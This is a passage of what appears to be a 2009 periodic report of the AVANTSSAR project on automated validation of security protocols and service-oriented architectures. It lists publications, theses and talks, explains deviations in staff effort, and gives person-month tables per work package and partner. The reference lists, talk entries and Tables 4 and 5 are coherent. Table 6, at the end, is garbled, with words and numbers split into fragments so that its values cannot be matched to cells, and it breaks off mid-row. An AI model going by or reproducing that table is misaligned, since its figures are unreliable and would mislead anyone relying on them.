[8] W. Arsac, G. Bella, X. Chantry, and L. Compagna. Validating Security Protocols under the General Attacker. In Joint Workshop on Automated Reasoning for Security Protocol Analysis and Issues in the Theory of Security (ARSPA-WITS 2009), ENTCS. Elsevier Science, 2009.

[9] P. Balbiani, Y. Chevalier, and M. el Houri. Approche logique pour les contraintes de contrôle d’accès dans les services web (A logical approach to access control constraints in web services). Presented at the Inforsid/SDEC 2009 workshop, 2009.

[10] P. Balbiani, Y. Chevalier, and M. el Houri. A logical framework for reasoning about policies with trust negotiations and workflows in a distributed environment. In Proceedings of the 4th International Conference on Risks and Security of Internet and Systems (Crisis’2009), 2009.

[11] P. Balbiani, F. Cheikh, and G. Feuillade. Résultats de complexité pour le problème de la composition d’agents (Complexity results for the agent composition problem). Cinquièmes Journées Francophones Modèles Formels de l’Interaction (MFI 09), to appear.

[12] P. Balbiani, F. Cheikh, and G. Feuillade. Controller/orchestrator synthesis via filtration. Methods for Modalities (M4M 2009), Electronic Notes in Theoretical Computer Science, to appear.

[13] P. Balbiani, F. Cheikh, P.-C. Héam, and O. Kouchnarenko. Composition of services with constraints. Formal Aspects of Component Software, Electronic Notes in Theoretical Computer Science, to appear.

[14] M. Barletta, S. Ranise, and L. Viganò. Verifying the Inter-play of Authorization Policies and Workflow in Service-Oriented Ar-chitectures. In Proceedings of the 2009 International Symposiumon Secure Computing (SecureCom 2009), Volume 3 of 2009 In-ternational Conference on Computational Science and Engineering(CSE 2009), pages 289–299. IEEE Computer Society Press, 2009.http://doi.ieeecomputersociety.org/10.1109/CSE.2009.172.

[15] A. Brucker and S. Mödersheim. Integrating Automated and InteractiveProtocol Verification. In P. Degano and J. Guttman, editors, Proceedingsof the 6th International Workshop on Formal Aspects in Security andTrust (FAST2009). Springer-Verlag. To appear.

[16] Y. Chevalier, M.A. Mekki, and M. Rusinowitch. Orchestration undersecurity constraints. In P. Degano and J. Guttman, editors, Proceedingsof the 6th International Workshop on Formal Aspects in Security andTrust (FAST2009). Springer-Verlag. To appear.


[17] Y. Chevalier and M. Rusinowitch. Compiling and securing cryptographic protocols. CoRR, abs/0910.5099, to appear.

[18] N. Chridi, M. Turuani, and M. Rusinowitch. Decidable Analysis for a Class of Cryptographic Group Protocols with Unbounded Lists. In Proceedings of the 22nd IEEE Computer Security Foundations Symposium (CSF'09), pages 277–289. IEEE Computer Society, 2009.

[19] L. Compagna, U. Flegel, and V. Lotz. Towards Validating Security Protocol Deployment in the Wild. In SAPSE 2009. IEEE Computer Society Press, 2009.

[20] B. Groza and M. Minea. A calculus to detect guessing attacks. In Proceedings of the 12th International Conference on Information Security, LNCS 5735, pages 59–67. Springer-Verlag, 2009.

[21] B. Groza and M. Minea. A formal approach for automated reasoning about off-line and undetectable on-line guessing (short paper). In Proceedings of the 14th International Conference on Financial Cryptography and Data Security, LNCS. Springer-Verlag, to appear.

[22] A. Imine, A. Cherif, and M. Rusinowitch. A Flexible Access Control Model for Distributed Collaborative Editors. In Secure Data Management, 6th VLDB Workshop, SDM 2009, LNCS 5776, pages 89–106. Springer-Verlag, 2009.

[23] S. Mauw, S. Radomirović, and M. Torabi Dashti. Minimal message complexity of asynchronous multi-party contract signing. In Proceedings of the 22nd IEEE Computer Security Foundations Symposium (CSF'09), pages 13–25. IEEE Computer Society, 2009.

[24] S. Mödersheim. Algebraic Properties in Alice and Bob Notation. In Proceedings of ARES 2009. IEEE Computer Society, 2009. Extended version available as IBM Research Report RZ3709.

[25] S. Mödersheim and L. Viganò. Secure Pseudonymous Channels. In Proceedings of ESORICS'09, LNCS 5789, pages 337–354. Springer-Verlag, 2009. Extended version: Technical Report RZ3724, IBM Zurich Research Lab, 2009, domino.research.ibm.com/library/cyberdig.nsf.

[26] S. Mödersheim and L. Viganò. The Open-Source Fixed-Point Model Checker for Symbolic Analysis of Security Protocols. In FOSAD 2008/2009, LNCS 5705, pages 166–194. Springer-Verlag, 2009.


[27] S. Mödersheim, L. Viganò, and D. Basin. Constraint Differentiation: Search-Space Reduction for the Constraint-Based Analysis of Security Protocols. Journal of Computer Security, to appear.

[28] S. Ranise. Towards Verification of Security-Aware Transaction E-services. In Proceedings of the International Workshop on First-Order Theorem Proving, Oslo, Norway, July 6–7, 2009.

[29] C. Rudolph, L. Compagna, R. Carbone, A. Muñoz, and J. Repp. Verification of S&D Solutions for Network Communications and Devices. In G. Spanoudakis, A. M. Gomez, and S. Kokolakis, editors, Security and Dependability for Ambient Intelligence, volume 45 of Advances in Information Security, pages 143–164. Springer, 2009.

[30] M. Torabi Dashti. Optimistic fair exchange using trusted devices. In Proceedings of the 11th International Symposium on Stabilization, Safety, and Security of Distributed Systems (SSS 2009). Springer-Verlag, 2009.

AVANTSSAR drafts

[31] M. Barletta, S. Ranise, and L. Viganò. A Declarative Two-Level Framework to Specify and Verify Workflow and Authorization Policies in Service-Oriented Architectures. 2009. Draft, submitted to a journal.

[32] D. Basin and C. Cremers. From Dolev-Yao to Strong Adaptive Corruption: Analyzing Security in the Presence of Compromising Adversaries. 2009. Draft, submitted.

[33] E. Burato, M. Cristani, and L. Viganò. A Deduction System for Meaning Negotiation. 2009. Draft, submitted.

[34] J. Camenisch, S. Mödersheim, G. Neven, F.-S. Preiss, and D. Sommer. A Credential-Based Access Control Requirements Language. 2009. Draft, available as IBM Research Report RZ3748.

[35] Y. Chevalier and M. Kourjieh. Decidability of Ground Entailment Problems for Order Saturated Sets of Clauses. 2009. Draft, available as IRIT Research Report IRIT/RR–2010-3–FR.

[36] A. Masini, L. Viganò, and M. Volpe. Labeled Natural Deduction for a Bundled Branching Temporal Logic. 2009. Draft, submitted to a journal.


[37] S. Mödersheim and D. Sommer. A Formal Model of Identity Mixer. 2009. Draft, available as IBM Research Report RZ3749.

5.6 AVANTSSAR theses

[38] R. Carbone. LTL Model-Checking for Security Protocols. PhD thesis, Università degli Studi di Genova, Italy, 2009. http://ai-lab.it/carbone/Phd-thesis/

[39] F. Cheikh. Composition de services: algorithmes et complexité [Service composition: algorithms and complexity]. PhD thesis, Université de Toulouse, Toulouse, France, 2009.

[40] N. Chridi. Contributions à la vérification automatique de protocoles de groupes [Contributions to the automatic verification of group protocols]. PhD thesis, Université Henri Poincaré - Nancy 1, September 2009. http://tel.archives-ouvertes.fr/tel-00417290/en/

[41] M. Kourjieh. Logical analysis and verification of cryptographic protocols. PhD thesis, Université de Toulouse, France, 2009.


5.7 AVANTSSAR talks and presentations

1. Secure pseudonymous channels
Luca Viganò (UNIVR)
Presentation of [25] at the Center for Logic and Computation of the Instituto Superior Tecnico, Lisbon, Portugal, January 23, 2009. (Already listed in D1.3 [AVA08a].)

2. La sicurezza informatica: attacchi e soluzioni [Computer security: attacks and solutions]
Luca Viganò (UNIVR)
Invited talk, including a project presentation, at "Infinita...mente" (a weekend of science and arts, http://www.infinitamente.univr.it/), Verona, Italy, January 31 and February 1, 2009. (Already listed in D1.3 [AVA08a].)

3. Secure pseudonymous channels
Luca Viganò (UNIVR)
Invited talk in the Workshoplet on Formal Methods for Security, Padova, Italy, March 12, 2009.

4. Secure pseudonymous channels
Luca Viganò (UNIVR)
Presentation of [25] at the Department of Informatics and Mathematics, Technical University of Denmark, Copenhagen, Denmark, April 2, 2009.

5. Validation methodologies
Luca Viganò (UNIVR)
Invited keynote at the FIA Prague Trust and Identity Session "Identity Provisioning in service platforms", Future Internet Conference, Prague, Czech Republic, May 12, 2009.

6. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented Architectures
Luca Viganò (UNIVR)
Presentation of [14] at the Center for Logic and Computation of the Instituto Superior Tecnico, Lisbon, Portugal, July 10, 2009.

7. On-the-Fly Model Checking of Security Protocols and Web Services
Luca Viganò (UNIVR)
Invited lecture at the 9th International School on Foundations of Security Analysis and Design (FOSAD), Centro Universitario Residenziale di Bertinoro, FC, Italy, August 29 – September 04, 2009.


8. Verso la validazione automatica della sicurezza delle architetture orientate ai servizi [Towards the automated validation of the security of service-oriented architectures]
Luca Viganò (UNIVR)
Faculty of Sciences of the University of Verona, Verona, Italy, September 23, 2009.

9. Automated Validation of Trust and Security of Service-oriented Architectures
Luca Viganò (UNIVR)
Invited talk at the ZISC Colloquium, Zurich Information Security Center (ZISC), Zurich, Switzerland, November 24, 2009.

10. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented Architectures
Michele Barletta (UNIVR)
Presentation of [14] at the 9th International School on Foundations of Security Analysis and Design (FOSAD), Centro Universitario Residenziale di Bertinoro, FC, Italy, September 04, 2009.

11. Towards Verification of Security-Aware Transaction E-services
Silvio Ranise (UNIVR)
International Workshop on First-Order Theorem Proving, Oslo, Norway, July 6–7, 2009. Presentation of [28].

12. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented Architectures
Silvio Ranise (UNIVR)
International Symposium on Secure Computing (SecureCom 2009), Vancouver, Canada, August 29–31, 2009. Presentation of [14].

13. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented Architectures
Silvio Ranise (UNIVR)
Microsoft Research, Redmond, WA, USA, September 01, 2009. Invited presentation of [14].

14. Optimistic fair exchange using trusted devices
Mohammad Torabi Dashti (ETH Zurich)
11th International Symposium on Stabilization, Safety, and Security of Distributed Systems (SSS 2009), Lyon, France, November 3–6, 2009. Presentation of [30].


15. From Dolev-Yao to Strong Adaptive Corruption: Analyzing Security in the Presence of Compromising Adversaries
Cas Cremers (ETH Zurich)
Invited talk at the Security Seminar at VERIMAG, Grenoble, France, February 10, 2009.

16. From Dolev-Yao to Strong Adaptive Corruption: Analyzing Security in the Presence of Compromising Adversaries
Cas Cremers (ETH Zurich)
Invited talk in the Workshoplet on Formal Methods for Security, Padova, Italy, March 12, 2009.

17. Cryptographic protocols as Building Blocks: From the Man-in-the-Middle attack to Compositional Symbolic Analysis
Cas Cremers (ETH Zurich)
Invited talk at the LSV Seminar, ENS Cachan, Paris, France, March 31, 2009.

18. Session-state Reveal is stronger than Ephemeral Key Reveal: Attacking the NAXOS Authenticated Key Exchange protocol
Cas Cremers (ETH Zurich)
ACNS'09, Paris, France, June 2, 2009.

19. Formalizing and analyzing compromising adversaries
Cas Cremers (ETH Zurich)
Invited talk at the Information Security seminar at Royal Holloway, University of London, November 12, 2009.

20. Validating Integrity for the Ephemerizer's Protocol with CL-AtSe
Mathieu Turuani (INRIA)
1st Luxembourg Day on Security and Reliability, Luxembourg, February 10, 2009.

21. Decidable Analysis for a Class of Cryptographic Group Protocols with Unbounded Lists
Najah Chridi (INRIA)
22nd IEEE Computer Security Foundations Symposium, Port Jefferson, July 8–10, 2009. Presentation of [18].

22. A Flexible Access Control Model for Distributed Collaborative Editors
Asma Cherif (INRIA)
Secure Data Management, 6th VLDB Workshop (SDM 2009), Lyon, August 28, 2009. Presentation of [22].


23. Orchestration under security constraints
Mohamed Anis Mekki (INRIA)
6th International Workshop on Formal Aspects in Security and Trust (FAST2009), Eindhoven, the Netherlands, November 5–6, 2009. Presentation of [16].

24. Master Courses on Security of Web Services and Master Courses on Security of Networks and Services
Laurent Vigneron (INRIA, Nancy 2)
Fall 2009, University of Nancy, France.

25. Approche logique pour les contraintes de contrôle d'accès dans les services Web [A logical approach to access-control constraints in web services]
Marwa El Houri (UPS-IRIT)
1er atelier sur les droits d'accès à des services et des données définis dans un environnement collaboratif (SDEC 2009) [1st workshop on access rights to services and data defined in a collaborative environment], Toulouse, May 2009. Presentation of [9].

26. A logical framework for reasoning about policies with trust negotiations and workflows in a distributed environment
Marwa El Houri (UPS-IRIT)
4th International Conference on Risks and Security of Internet and Systems (CRiSIS 2009), Toulouse, October 2009. Presentation of [10].

27. Résultats de complexité pour le problème de la composition d'agents [Complexity results for the agent composition problem]
Guillaume Feuillade (UPS-IRIT)
5èmes journées francophones sur les modèles formels de l'interaction (MFI 2009) [5th French-speaking workshop on formal models of interaction], Lannion, June 2009. Presentation of [11].

28. Controller/orchestrator synthesis via filtration
Guillaume Feuillade (UPS-IRIT)
Methods for Modalities (M4M 2009), Copenhagen, November 2009. Presentation of [12].

29. Formal Analysis of SAML 2.0 Web Browser Single Sign-On: Breaking the SAML-based Single Sign-On for Google Apps
Alessandro Armando (UGDIST)
Invited talk at the Center for Information Technology - IRST, Fondazione Bruno Kessler, Trento, March 2, 2009.


30. Formal Specification and Automatic Analysis of Business Processes under Authorization Constraints: an Action-based Approach
Serena Elisa Ponta (UGDIST)
6th International Conference on Trust, Privacy and Security in Digital Business (TrustBus'09), Linz, Austria, August 31 – September 4, 2009. Presentation of [4].

31. Model Checking of Security-sensitive Business Processes
Serena Elisa Ponta (UGDIST)
6th International Workshop on Formal Aspects in Security and Trust (FAST2009), Eindhoven, the Netherlands, November 5–6, 2009. Presentation of [5].

32. Algebraic Properties in Alice and Bob Notation
Sebastian Mödersheim (IBM)
4th International Conference on Availability, Reliability and Security (ARES), Fukuoka, Japan, March 16–19, 2009. Presentation of [24].

33. Secure Pseudonymous Channels
Sebastian Mödersheim (IBM)
14th European Symposium on Research in Computer Security (ESORICS), Saint Malo, France, September 21–23, 2009. Presentation of [25].

34. Integrating Automated and Interactive Protocol Verification
Sebastian Mödersheim (IBM), with Achim Brucker (SAP)
6th International Workshop on Formal Aspects in Security and Trust (FAST), Eindhoven, the Netherlands, November 5–6, 2009. Presentation of [15].

35. A calculus to detect guessing attacks
Marius Minea (IEAT)
12th International Conference on Information Security, Pisa, Italy, September 7–9, 2009. Presentation of [20].

36. Validating Security Protocols under the General Attacker
Xavier Chantry (SAP)
Joint Workshop on Automated Reasoning for Security Protocol Analysis and Issues in the Theory of Security (ARSPA-WITS 2009), March 28–29, 2009, York, UK. Presentation of [8].


37. Attacking Each Other
Xavier Chantry (SAP)
17th International Workshop on Security Protocols (IWSP 2009), April 1–3, 2009, Cambridge, UK. Presentation of [7].

38. AVANTSSAR Demo on Trust and Security of Internet of Services (IoS)
Alessandro Sorniotti (SAP)
The Future of the Internet Conference (FIA Prague), May 11–13, 2009, Prague, Czech Republic. Demo of the discovery of the serious vulnerability in the SAML-based SSO for Google Apps.

39. Avantssar Industry Migration: NW SAML NGSSO - Initial set of results of 2009 collaboration
Luca Compagna (SAP)
SAP AG - NW SIM, June 16, 2009, virtual talk. The initial set of results was discussed with the SAP Steering Committee and Experts Group (people selected from SAP NW Security and Identity Management).

40. Avantssar Industry Migration: NW BPM - security validator plugin - interim result of 2009 collaboration
Wihem Arsac (SAP)
NetWeaver BPM transferring activity review, September 28, 2009, Walldorf, Germany. The interim results were discussed with the SAP NetWeaver BPM transferring committee (people selected from SAP NW Business Process Management).

41. Model Checking (security-annotated) Business Processes in SAP NetWeaver BPM
Wihem Arsac (SAP)
Security Week at SAP LABS France, November 23–27, 2009, Sophia Antipolis, France.

42. Avantssar Industry Migration: NW SAML NGSSO - results of 2009 collaboration and next steps
Luca Compagna (SAP)
SAP AG - NW SIM, November 26, 2009, Walldorf, Germany. The final results achieved in 2009 and the next steps were discussed with the SAP Steering Committee and Experts Group (people selected from SAP NW Security and Identity Management).


43. Avantssar Industry Migration: NW BPM - our security validator plugin
Luca Compagna (SAP)
SAP AG - NW BPM, November 27, 2009, Walldorf, Germany. Presentation of the pre-final results achieved to core people of SAP NetWeaver BPM.

44. Avantssar Industry Migration: NW BPM - our security validator plugin
Wihem Arsac (SAP)
SAP AG - Sales Montpellier, December 14, 2009, virtual talk. Presentation of our security validator plugin to SAP Sales. This work may be shown in the future at events targeting SAP customers.

45. Avantssar Industry Migration: NW BPM - security validator plugin - result of 2009 collaboration and next steps
Wihem Arsac (SAP)
NetWeaver BPM transferring activity review, December 15, 2009, Walldorf, Germany. The final results achieved in 2009 and the next steps were discussed with the SAP NetWeaver BPM transferring committee (people selected from SAP NW Business Process Management).


6 Explanation of the use of the resources

The following pages detail the resources and the cost breakdown (including a list of the meetings and related expenses). The resources and corresponding costs are all in line with what was planned and estimated in the Description of Work.

We begin by detailing the resources, then provide explanations of personnel costs, subcontracting and any major direct costs, and conclude by listing the costs for the meetings (grouped as "General project meetings", "Working meetings" and "Participation to European and scientific events").


6.1 Resources

Tables 4–7 summarize the total resources for Period P2. Progress overview sheets for the beneficiaries, detailing the resources, are given in Tables 8–17.

Some remarks:

• The additional effort by UNIVR on WP5 is due to the fact that junior researchers were hired to work on the project, which resulted in the work being carried out with an effort higher than originally planned but within the foreseen overall costs. Therefore, this deviation with respect to the initial estimate has marginal impact on the resources.

• Considering the annual average effort, IRIT's effort for 2009 was around 4 person-months more than expected. This increase is related to the completion of their PhDs by two of our students. The impact on the overall cost for the IRIT partner is nonetheless marginal, because of the cost structure.

• The additional effort by UGDIST on WP2 is due to the fact that junior researchers were hired to work on the project, which resulted in the work being carried out with an effort higher than originally planned but within the foreseen overall costs. Therefore, this deviation with respect to the initial estimate has marginal impact on the resources.

• IEAT's effort for 2009 was 3 person-months less than planned, due to a leave of absence taken by a PhD student at the beginning of the year. For 2010, IEAT will employ part-time an additional PhD student and a Master's student, for work on WP4 (tool support) and WP5 (modelling), resulting in additional person-months for the project at no extra cost.

• The reduced effort by SAP is due to the fact that a number of senior researchers were hired to work on the project, which resulted in the work being carried out with an effort lower than originally planned but within the foreseen overall costs. Therefore, this deviation with respect to the initial estimate has marginal impact on the resources.


Table 4: Total resources for Period P2 (effort in person-months; Start/End in project months; empty cells are empty in the source)

WP/Task | Planned Start | Planned End | Actual Start | Actual End | Est. Total | Act. P1 | Act. P2 | Act. P1+P2 | Remaining effort
WP 1 Project Management | 1 | 36 | 1 | 36 | 22.00 | 5.48 | 7.13 | 12.61 | 9.39
WP 1.1 Project Coordination | 1 | 36 | 1 | | 5.25 | 0.94 | 2.13 | 3.07 |
WP 1.2 Project Meetings | 1 | 36 | 1 | | 9.30 | 3.00 | 2.11 | 5.11 |
WP 1.3 Project Administration | 1 | 36 | 1 | | 7.45 | 1.54 | 2.89 | 4.43 |
WP 2 Modeling trust and security aspects… | 1 | 30 | 1 | 30 | 99.00 | 38.72 | 52.25 | 90.97 | 8.03
WP 2.1 Initial version of ASLan… | 1 | 9 | 1 | 9 | 37.50 | 35.57 | 6.22 | 41.79 |
WP 2.2 Extended version of ASLan… | 10 | 18 | 10 | | 32.75 | 3.15 | 45.33 | 48.48 |
WP 2.3 Final version of ASLan… | 19 | 30 | | | 28.75 | 0.00 | 0.70 | 0.70 |
WP 3 Automated reasoning techniques | 1 | 36 | 1 | | 154.00 | 47.94 | 60.95 | 108.89 | 45.11
WP 3.1 Satisfiability of ASLan policies | 1 | 30 | 1 | | 45.98 | 10.08 | 17.66 | 27.74 |
WP 3.2 Model checking of ASLan services… | 6 | 32 | 6 | | 33.66 | 6.79 | 17.72 | 24.51 |
WP 3.3 Attacker models | 1 | 10 | 1 | 10 | 35.70 | 27.94 | 14.91 | 42.85 |
WP 3.4 Compositional reasoning for services… | 6 | 34 | 6 | | 26.66 | 2.72 | 8.73 | 11.45 |
WP 3.5 Abstraction techniques… | 9 | 34 | 9 | | 12.00 | 0.41 | 1.93 | 2.34 |
WP 4 The AVANTSSAR Validation Platform | 1 | 36 | 1 | 36 | 110.00 | 10.99 | 42.04 | 53.03 | 56.97
WP 4.1 The TS Orchestrator | 6 | 30 | 6 | | 35.50 | 7.19 | 8.60 | 15.79 |
WP 4.2 The TS Validator | 6 | 30 | 6 | | 52.75 | 3.50 | 15.36 | 18.86 |
WP 4.3 Platform integration | 6 | 30 | 6 | | 21.75 | 0.30 | 18.08 | 18.38 |
WP 5 Proof of concept | 1 | 36 | 1 | 36 | 109.00 | 45.89 | 41.90 | 87.79 | 21.21
WP 5.1 Definition of the relevant problem cases | 1 | 6 | 1 | 6 | 19.50 | 27.84 | 0.55 | 28.39 |
WP 5.2 Formalisation of the problem cases | 3 | 30 | 3 | | 48.50 | 16.05 | 25.84 | 41.89 |
WP 5.3 Validation of the problem cases | 9 | 36 | 9 | | 24.00 | 2.00 | 9.85 | 11.85 |
WP 5.4 Assessment | 9 | 36 | 9 | | 17.00 | 0.00 | 5.66 | 5.66 |
WP 6 Dissemination and industry migration | 1 | 36 | 1 | 36 | 96.00 | 18.81 | 22.43 | 41.24 | 54.76
WP 6.1 Dissemination | 1 | 36 | 1 | | 37.00 | 4.75 | 11.48 | 16.23 |
WP 6.2 Migration to industrial development env | 1 | 36 | 1 | | 51.00 | 13.76 | 8.95 | 22.71 |
WP 6.3 Migration to standardisation bodies | 25 | 36 | 4 | | 8.00 | 0.30 | 2.00 | 2.30 |
Total AVANTSSAR | | | | | 590.00 | 167.84 | 226.70 | 394.54 | 195.46

Table 5: Total resources for Period P2 (full table, part 1/3). For each beneficiary the five values are: Act. P1, Act. P2, Act. P3, Est. Total, Act. Total (person-months; empty cells are empty in the source).

WP/Task | Planned Start | Planned End | Actual Start | Actual End | UNIVR (Act P1, Act P2, Act P3, Est, Act Total) | ETH Zurich (Act P1, Act P2, Act P3, Est, Act Total) | INRIA (Act P1, Act P2, Act P3, Est, Act Total)
WP 1 Project Management | 1 | 36 | 1 | 36 | 2.76, 4.54, 0.00, 13.00, 7.30 | 0.30, 0.30, 0.00, 1.00, 0.60 | 0.30, 0.30, 0.00, 1.00, 0.60
WP 1.1 Project Coordination | 1 | 36 | 1 | | 0.94, 2.12, 0.00, 5.00, 3.06 | 0.00, 0.00, 0.00, 0.00, 0.00 | 0.00, 0.00, 0.00, 0.00, 0.00
WP 1.2 Project Meetings | 1 | 36 | 1 | | 1.18, 0.62, 0.00, 4.00, 1.80 | 0.20, 0.20, 0.00, 0.70, 0.40 | 0.20, 0.20, 0.00, 0.70, 0.40
WP 1.3 Project Administration | 1 | 36 | 1 | | 0.64, 1.80, 0.00, 4.00, 2.44 | 0.10, 0.10, 0.00, 0.30, 0.20 | 0.10, 0.10, 0.00, 0.30, 0.20
WP 2 Modeling trust and security aspects… | 1 | 30 | 1 | 30 | 1.85, 9.42, 0.00, 15.00, 11.27 | 10.00, 10.00, 0.00, 20.00, 20.00 | 2.00, 2.00, 0.00, 5.00, 4.00
WP 2.1 Initial version of ASLan… | 1 | 9 | 1 | 9 | 1.70, 0.00, 0.00, 5.00, 1.70 | 9.00, 1.00, 0.00, 7.00, 10.00 | 2.00, 0.00, 0.00, 1.00, 2.00
WP 2.2 Extended version of ASLan… | 10 | 18 | 10 | | 0.15, 8.72, 0.00, 5.00, 8.87 | 1.00, 9.00, 0.00, 7.00, 10.00 | 0.00, 2.00, 0.00, 2.00, 2.00
WP 2.3 Final version of ASLan… | 19 | 30 | | | 0.00, 0.70, 0.00, 5.00, 0.70 | 0.00, 0.00, 0.00, 6.00, 0.00 | 0.00, 0.00, 0.00, 2.00, 0.00
WP 3 Automated reasoning techniques | 1 | 36 | 1 | | 6.46, 10.01, 0.00, 20.00, 16.47 | 4.00, 8.00, 0.00, 26.00, 12.00 | 9.70, 7.30, 0.00, 23.00, 17.00
WP 3.1 Satisfiability of ASLan policies | 1 | 30 | 1 | | 0.60, 2.23, 0.00, 8.00, 2.83 | 0.00, 0.00, 0.00, 2.00, 0.00 | 1.70, 1.30, 0.00, 8.00, 3.00
WP 3.2 Model checking of ASLan services… | 6 | 32 | 6 | | 0.79, 1.32, 0.00, 3.00, 2.11 | 1.00, 3.00, 0.00, 7.00, 4.00 | 0.00, 6.00, 0.00, 3.00, 6.00
WP 3.3 Attacker models | 1 | 10 | 1 | 10 | 3.71, 3.12, 0.00, 3.00, 6.83 | 2.50, 2.00, 0.00, 8.00, 4.50 | 8.00, 0.00, 0.00, 10.00, 8.00
WP 3.4 Compositional reasoning for services… | 6 | 34 | 6 | | 1.22, 2.56, 0.00, 3.00, 3.78 | 0.50, 3.00, 0.00, 9.00, 3.50 | 0.00, 0.00, 0.00, 2.00, 0.00
WP 3.5 Abstraction techniques… | 9 | 34 | 9 | | 0.14, 0.78, 0.00, 3.00, 0.92 | 0.00, 0.00, 0.00, 0.00, 0.00 | 0.00, 0.00, 0.00, 0.00, 0.00
WP 4 The AVANTSSAR Validation Platform | 1 | 36 | 1 | 36 | 0.19, 6.17, 0.00, 12.00, 6.36 | 0.00, 3.00, 0.00, 13.00, 3.00 | 7.00, 7.00, 0.00, 19.00, 14.00
WP 4.1 The TS Orchestrator | 6 | 30 | 6 | | 0.19, 0.62, 0.00, 5.00, 0.81 | 0.00, 1.00, 0.00, 2.00, 1.00 | 7.00, 6.00, 0.00, 11.00, 13.00
WP 4.2 The TS Validator | 6 | 30 | 6 | | 0.00, 2.43, 0.00, 7.00, 2.43 | 0.00, 2.00, 0.00, 10.00, 2.00 | 0.00, 0.00, 0.00, 8.00, 0.00
WP 4.3 Platform integration | 6 | 30 | 6 | | 0.00, 3.12, 0.00, 0.00, 3.12 | 0.00, 0.00, 0.00, 1.00, 0.00 | 0.00, 1.00, 0.00, 0.00, 1.00
WP 5 Proof of concept | 1 | 36 | 1 | 36 | 7.64, 6.86, 0.00, 5.00, 14.50 | 3.70, 4.70, 0.00, 7.00, 8.40 | 2.00, 2.00, 0.00, 6.00, 4.00
WP 5.1 Definition of the relevant problem cases | 1 | 6 | 1 | 6 | 6.41, 0.55, 0.00, 1.00, 6.96 | 1.00, 0.00, 0.00, 2.00, 1.00 | 0.00, 0.00, 0.00, 0.00, 0.00
WP 5.2 Formalisation of the problem cases | 3 | 30 | 3 | | 1.23, 4.76, 0.00, 2.00, 5.99 | 2.70, 4.00, 0.00, 2.00, 6.70 | 1.00, 1.00, 0.00, 3.00, 2.00
WP 5.3 Validation of the problem cases | 9 | 36 | 9 | | 0.00, 1.55, 0.00, 1.00, 1.55 | 0.00, 0.70, 0.00, 2.00, 0.70 | 1.00, 1.00, 0.00, 3.00, 2.00
WP 5.4 Assessment | 9 | 36 | 9 | | 0.00, 1.46, 0.00, 1.00, 1.46 | 0.00, 0.00, 0.00, 1.00, 0.00 | 0.00, 0.00, 0.00, 0.00, 0.00
WP 6 Dissemination and industry migration | 1 | 36 | 1 | 36 | 1.75, 3.28, 0.00, 8.00, 5.03 | 0.00, 0.00, 0.00, 5.00, 0.00 | 0.00, 2.27, 0.00, 5.00, 2.27
WP 6.1 Dissemination | 1 | 36 | 1 | | 1.75, 2.96, 0.00, 6.00, 4.71 | 0.00, 0.00, 0.00, 3.00, 0.00 | 0.00, 2.27, 0.00, 4.00, 2.27
WP 6.2 Migration to industrial development env | 1 | 36 | 1 | | 0.00, 0.32, 0.00, 1.00, 0.32 | 0.00, 0.00, 0.00, 1.00, 0.00 | 0.00, 0.00, 0.00, 1.00, 0.00
WP 6.3 Migration to standardisation bodies | 25 | 36 | 4 | | 0.00, 0.00, 0.00, 1.00, 0.00 | 0.00, 0.00, 0.00, 1.00, 0.00 | 0.00, 0.00, 0.00, 0.00, 0.00
Total | | | | | 20.65, 40.28, 0.00, 73.00, 60.93 | 18.00, 26.00, 0.00, 72.00, 44.00 | 21.00, 20.87, 0.00, 59.00, 41.87

Table6:

Totalr

esou

rces

forPe

riodP2

(fulltable,

part

2/3)

P1

P2

P3

P1

P2

P3

P1

P2

P3

P1

P2

P3

WP

/Task

Sta

rtE

nd

Sta

rtE

nd

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Pro

ject

Man

ag

em

en

tW

P 1

136

136

0.2

50.2

50.0

01.0

00.5

00.5

00.0

00.0

01.0

00.5

00.3

00.6

50.0

01.0

00.9

50.4

00.3

00.0

01.2

00.7

0

Pro

ject

Coord

ination

WP

1.1

136

1

0.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

10.0

00.2

50.0

10.0

00.0

00.0

00.0

00.0

0

Pro

ject

Meetings

WP

1.2

136

1

0.2

50.2

50.0

00.7

00.5

00.0

00.0

00.0

00.3

00.0

00.3

00.2

50.0

00.5

00.5

50.4

00.1

00.0

00.7

00.5

0

Pro

ject

Adm

inis

tration

WP

1.3

136

1

0.0

00.0

00.0

00.3

00.0

00.5

00.0

00.0

00.7

00.5

00.0

00.3

90.0

00.2

50.3

90.0

00.2

00.0

00.5

00.2

0

Mo

delin

g t

rust

an

d s

ecu

rity

asp

ects

…W

P 2

130

130

4.7

84.4

00.0

08.0

09.1

82.0

013.0

00.0

05.0

015.0

03.9

52.1

20.0

06.0

06.0

70.4

00.6

00.0

03.0

01.0

0

Initia

l vers

ion o

f A

SLan…

WP

2.1

19

19

4.7

80.0

00.0

04.0

04.7

82.0

00.0

00.0

02.0

02.0

03.9

50.7

20.0

02.0

04.6

70.4

00.0

00.0

01.5

00.4

0

Ext

ended v

ers

ion o

f A

SLan…

WP

2.2

10

18

10

0.0

04.4

00.0

02.0

04.4

00.0

013.0

00.0

02.0

013.0

00.0

01.4

00.0

02.0

01.4

00.0

00.6

00.0

00.7

50.6

0

Fin

al vers

ion o

f A

SLan…

WP

2.3

19

30

0.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

00.7

50.0

0

Au

tom

ate

d r

easo

nin

g t

ech

niq

ues

WP

31

36

1

10.7

816.1

30.0

024.0

026.9

16.5

08.5

00.0

020.0

015.0

02.1

82.3

20.0

014.0

04.5

00.2

00.1

00.0

00.8

00.3

0

Satisfiabili

ty o

f A

SLan p

olic

ies

WP

3.1

130

1

7.7

814.1

30.0

016.0

021.9

10.0

00.0

00.0

04.0

00.0

00.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

00.3

20.0

0

Model checkin

g o

f A

SLan s

erv

ices…

WP

3.2

632

6

1.0

00.0

00.0

06.0

01.0

03.0

06.0

00.0

06.0

09.0

00.0

00.0

00.0

02.0

00.0

00.0

00.1

00.0

00.1

60.1

0

Att

acker

models

WP

3.3

110

110

1.0

00.0

00.0

00.0

01.0

03.5

02.5

00.0

05.0

06.0

01.9

10.0

00.0

02.0

01.9

10.2

00.0

